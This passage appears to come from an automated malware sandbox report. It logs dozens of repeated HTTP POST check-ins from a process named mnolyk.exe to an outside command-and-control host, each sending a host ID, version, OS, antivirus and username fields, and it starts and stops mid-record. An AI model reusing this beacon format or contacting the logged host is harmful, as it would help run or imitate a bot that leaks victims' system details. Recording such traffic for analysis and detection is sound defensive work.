                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      562192.168.2.75025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:34.266479015 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.330198050 CET677INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      563192.168.2.75025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:34.513209105 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.576956034 CET678INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      564192.168.2.75025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:34.780949116 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.843144894 CET679INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      565192.168.2.75026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:35.014959097 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.082820892 CET680INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      566192.168.2.75026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:35.263576984 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.330900908 CET681INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      567192.168.2.75026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:35.513957977 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.580169916 CET682INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      568192.168.2.75026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:35.762538910 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.826868057 CET683INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      569192.168.2.75026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:35.995836020 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.062863111 CET684INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      57192.168.2.74975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:15.374109983 CET172OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.436098099 CET172INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      570192.168.2.75026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:36.236424923 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.301420927 CET685INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      571192.168.2.75026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:36.481026888 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.545967102 CET686INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      572192.168.2.75026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:36.717040062 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:36.778573036 CET687INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      573192.168.2.75026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:36.981445074 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.047588110 CET688INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      574192.168.2.75026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:37.221379995 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.286880016 CET689INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      575192.168.2.75027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:37.475503922 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.542831898 CET690INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      576192.168.2.75027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:37.717474937 CET691OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:37.782658100 CET691INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      577192.168.2.75027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:37.970566034 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.039640903 CET692INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      578192.168.2.75027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:38.220730066 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.284318924 CET693INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      579192.168.2.75027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:38.463285923 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:38.525685072 CET694INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      58192.168.2.74975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:15.610893011 CET173OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
